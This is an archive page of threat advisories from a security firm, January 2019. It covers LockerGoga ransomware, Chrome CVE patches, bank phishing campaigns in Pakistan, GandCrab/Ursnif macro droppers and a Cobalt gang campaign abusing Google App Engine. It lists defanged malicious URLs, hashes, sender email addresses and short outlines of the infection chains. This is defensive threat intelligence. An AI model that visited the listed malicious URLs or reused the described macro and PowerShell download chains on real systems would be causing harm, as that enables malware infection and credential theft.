Archive for January, 2019

Rewterz Threat Alert – New LockerGoga Ransomware used in Cyber Attacks in Multiple Countries




SEVERITY: Cyber Crime





New LockerGoga Ransomware has been found mainly in a cyber attack on the French engineering consultancy, Altran Technologies.


The distribution method of this Ransomware is not clear yet. Once the ransomware is executed, it targets DOC, DOT, WBK, DOCX, DOTX, DOCB, XLM, XLSX, XLTX, XLSB, XLW, PPT, POT, PPS, PPTX, POTX, PPSX, SLDX, and PDF files. Samples for this ransomware have been uploaded from Romania and Netherlands whereas its victims have been observed in five different countries.


The ransomware can spread laterally through network connections and network shares, resulting in widespread file encryption. Some researchers declared it a sloppy, slow ransomware that doesn’t aim to evade detection. Security researchers informed that the ransomware spawned a new process for each file it encrypted, making the encryption process to be very slow. Once it has encrypted files, it appends the extension .locked to encrypted files and leaves a ransom note on the desktop like this:





Bleeping Computer suggests that the first rule of Security Researcher V should be considered while trying to detect the family of infections using Yara, in order to save organizations from the LockerGoga Ransomware.








  • worker32
  • bdf36127817413f625d2625d3133760af724d6ad2410bea7297ddc116abc268f_wQkb8SOVnc[.]
  • bin svch0st[.]5817[.]exe
  • svch0st[.]11077[.]exe



Email Address


  • CottleAkela[@]protonmail[.]com
  • QyavauZehyco1994[@]o2[.]pl



Malware Hash (MD5/SHA1/SH256)


  • bdf36127817413f625d2625d3133760af724d6ad2410bea7297ddc116abc268f
  • 52340664fe59e030790c48b66924b5bd 73171ffa6dfee5f9264e3d20a1b6926ec1b60897





Block the threat indicators at their respective controls and keep your systems up-to-date. Since the attack vector is still unknown, using products with vulnerabilities increases risk of attack by a malicious entity.


Rewterz Threat Advisory – Google Releases Security Updates for Chrome Multiple Vulnerabilities




CATEGORY: Vulnerability






Google has released security updates for Google Chrome addressing multiple vulnerabilities that an attacker could exploit to take control of an affected system. There are 58 security fixes in the new version for Windows, Mac and Linux. Following vulnerabilities ranging from Medium to High severity have been addressed.

CVE-2019-5754: Inappropriate implementation in QUIC Networking

CVE-2019-5755: Inappropriate implementation in V8

CVE-2019-5756: Use after free in PDFium

CVE-2019-5757: Type Confusion in SVG

CVE-2019-5758: Use after free in Blink.

CVE-2019-5759: Use after free in HTML select elements.

CVE-2019-5760: Use after free in WebRTC

CVE-2019-5761: Use after free in SwiftShader

CVE-2019-5762: Use after free in PDFium

CVE-2019-5763: Insufficient validation of untrusted input in V8.

CVE-2019-5764: Use after free in WebRTC

CVE-2019-5765: Insufficient policy enforcement in the browser.

CVE-2019-5766: Insufficient policy enforcement in Canvas.

CVE-2019-5767: Incorrect security UI in WebAPKs.

CVE-2019-5768: Insufficient policy enforcement in DevTools.

CVE-2019-5769: Insufficient validation of untrusted input in Blink.

CVE-2019-5770: Heap buffer overflow in WebGL

CVE-2019-5771: Heap buffer overflow in SwiftShader

CVE-2019-5772: Use after free in PDFium

CVE-2019-5773: Insufficient data validation in IndexedDB.

CVE-2019-5774: Insufficient validation of untrusted input in SafeBrowsing.

CVE-2019-5775: Insufficient policy enforcement in Omnibox.

CVE-2019-5776: Insufficient policy enforcement in Omnibox.

CVE-2019-5777: Insufficient policy enforcement in Omnibox.

CVE-2019-5778: Insufficient policy enforcement in Extensions.

CVE-2019-5779: Insufficient policy enforcement in ServiceWorker.

CVE-2019-5780: Insufficient policy enforcement

CVE-2019-5781: Insufficient policy enforcement in Omnibox.

CVE-2019-5782: Inappropriate implementation in V8

Other issues addressed in the update include:

Use after free in FileAPI

Use after free in Mojo interface

Use after free in Payments.

Stack buffer overflow in Skia



Attackers can exploit these issues to execute arbitrary code in the context of the browser, bypass security restrictions and possibly take control of a system.





Code Execution

Security Bypass

System Access





Update to the latest version: Chrome 72.0.3626.81 for Windows, Mac and Linux, which contains a number of fixes and improvements.



If you think you’re a victim of a cyber-attack, immediately send an email to

Rewterz Threat Alert – Phishing Awareness For Employees and Customers of the Banking Industry




CATEGORY: Phishing 






Looking at the recent Phishing Campaigns observed attacking employees of the banking sector in Pakistan, it’s highly possible that the same Phishing Attacks are targeting customers of banks too. Therefore, it is suggested to urgently run awareness programs for employees as well as customers.


Phishing emails are fake emails falsely claiming identity of a legitimate organization in order to steal credentials or personal information. Phishing mainly uses popular communication tools like emails, instant messaging and peer-to-peer communication, either directly obtaining sensitive information or luring victims into visiting fake websites.


The fake websites usually look very similar to the legitimate websites of the respective banks and can not be detected as malicious by an unsuspecting user. The information entered on such sites like username, passwords, etc. can be used to carry out fraudulent activities like unauthenticated transactions or can be sold to fraudulent groups for further malicious activity.






Information Disclosure

Credential Theft

Account Compromise

Fraudulent Transactions





  • Do not share your account information (user name, password, account number, etc) with anyone. Your Bank already has your information and it will never demand sensitive information via email.
  • Disable all kinds of auto-download options for incoming files and documents.
  • Your account will never be closed automatically even if you have previously ignored your bank’s emails. Any email warning you about closure of your account is fake.
  • Never click a link or pop-up message received in an email to access your account. It’s likely to redirect you to a fake log-in page.
  • If you want to access your online account, carefully type the legitimate URL in the browser address bar instead of following links.
  • Set up real-time scanning for viruses and automatic updates of virus definitions.
  • Before processing transactions, Bank employees should verify all transactions directed via Alerts like SMS or email that appears to have come from the bank.
  • Be very careful while entering login information on any web page and never try to log in on a site which you did not open intentionally.
  • If you receive any email or text that looks suspicious, immediately report to the concerned bank.

Rewterz Threat Alert – GrandCrab and Ursnif Campaign Observed in the Wild




CATEGORY: Phishing






A campaign distributing both Ursnif malware and GrandCrab ransomware via malicious Word documents attached to phishing emails. The Word documents contained a VBS macro that executes a base64 encoded PowerShell script. The PowerShell script is used to retrieve the files associated with the GrandCrab and Ursnif infections. The first payload that is downloaded and executed is a PowerShell command used to download an additional PowerShell script. This additional PowerShell script contains a base64 encoded PE file which it injects into memory for execution. This PE file was identified to be a variant of the GrandCrab ransomware. The second payload that is download and executed via the VBS macro is the Ursnif executable, which is used for malicious activities such as gathering system information and harvesting credentials.







Leakage of system information
Loss of credentials











Malware Hash (MD5/SHA1/SH256)







Block all URL’s and IoC’s at your respective controls.
Ensure anti virus software and associated files are up to date.
Always be suspicious about emails sent to users from unknown senders.

Rewterz Threat Alert: Fresher Phishing Campaigns Targeting Pakistani Bank Employees




CATEGORY: Phishing






Following the previous two phishing campaigns that spoofed Summit Bank and Bank Al-Habib, the streak continues targeting bank employees in Pakistan with two fresher campaigns. This time the attackers spoofed Faysal Bank’s internet banking site and the Standard Chartered Bank. The email claiming to come from Faysal Bank looks like this:





Whereas, clicking on the “Click Here Now”, users are redirected to a malicious URL that looks very similar to the legitimate Internet Banking site of Faysal Bank. An unsuspecting user isn’t likely to differentiate between the fake and the original site.





Second campaign of the day fakes the identity of Standard Chartered Bank and has targeted more than hundred bank employees in Pakistan. The email pretending to be coming from Standard Chartered bank looks like this:




The hyperlink in this email also redirects to a URL which again looks similar to the legitimate site.





However, this time the site requires more information other than just credentials. When the information is provided, the user is redirected to the login page of original website of the bank, not logged-in.





Credential Theft

Exposure of Personal Information



Indicators of Compromise






https[:]//cbd9[.]net/images/query/faysalmobit/faysalmobit[.]php http[:]//blayzercommerce[.]com/wp-content/themes/twentysixteen/schartered/schartered[.]html



Email Address







Email Subject



Faysal Bank Account Locked

Standard Chartered Bank – Account Locked





The count of these phishing campaigns targeting bank employees in Pakistan and spoofing the identity of banks has reached four now. It is advised to strictly avoid opening irrelevant or unexpected emails, attachments and URLs even if the source looks as legitimate as a financial organization.

Rewterz Threat Alert: The Cobalt gang exploiting Google App Engine to distribute malware through PDF decoy documents










Known for targeting financial organizations, the Cobalt gang resurfaces with another campaign that drops malware. About 42 targets from the financial and banking sector around the World have been attacked by the Cobalt gang’s campaign, meant to drop malware via PDF decoys using App Engine Google Cloud computing platform (GCP).


The attackers are abusing the GCP URL redirection in PDF decoys and redirecting to the malicious URL hosting the malicious payload.





The URL hosting the malware points the host URL to Google App Engine, making it more trust-able for the targets. Most of the PDF’s involved were created using Adobe Acrobat 18.0. The PDF decoy downloads a word document containing obfuscated macro code. This document was downloaded from the URL https://transef[.]biz.





Once the download is complete, a message pops up on opening the document that requires enabling editing and content mode to view the document. On enabling the option, the macro is executed downloading another stage payload.






Code Execution

Malware Infection








  • pace[.]edu
  • ulaval[.]ca
  • metacase[.]eu
  • ivywise[.]com
  • transef[.]biz
  • ebf[.]eu[.]com
  • hxxps://[.]com/_ah/logout?continue=https%3A%2F%2Ftransef[.]biz%2FDoc102018[.]doc
  •[.]com/_ah/logout?continue=https%3A%2F%2Fswptransaction-scan2034[.]s3[.]ca-central-1[.]a mazonaws[.]com%2FDoc102018[.]doc






  • fr[.]txt












  • jk01814n[@]pace[.]edu
  • benoit[.]filion[.]2[@]ulaval[.]ca
  • alexandre[.]custeau[.]1[@]ulaval[.]ca
  • dominique[.]denis-berube[.]1[@]ulaval[.]ca
  • helpdesk[@]metacase[.]eu
  • adrienne[@]ivywise[.]com
  • info[@]ebf[.]eu[.]com
  • sec[@]ebf[.]eu[.]com
  • r[.]evans[@]ebf[.]eu[.]com






  • Block the threat indicators at their respective controls.
  • Warn users against opening un-trusted attachments, regardless of their extensions or filenames.
  • Warn users to avoid executing any file without confirming that they are not malicious.
  • Un-check the option “Remember this action for this site for all PDF documents” in the PDF reader software. The Default Allow policy can help in downloading malware even from trusted sites like Google App Engine.

Copyright © Rewterz. All rights reserved.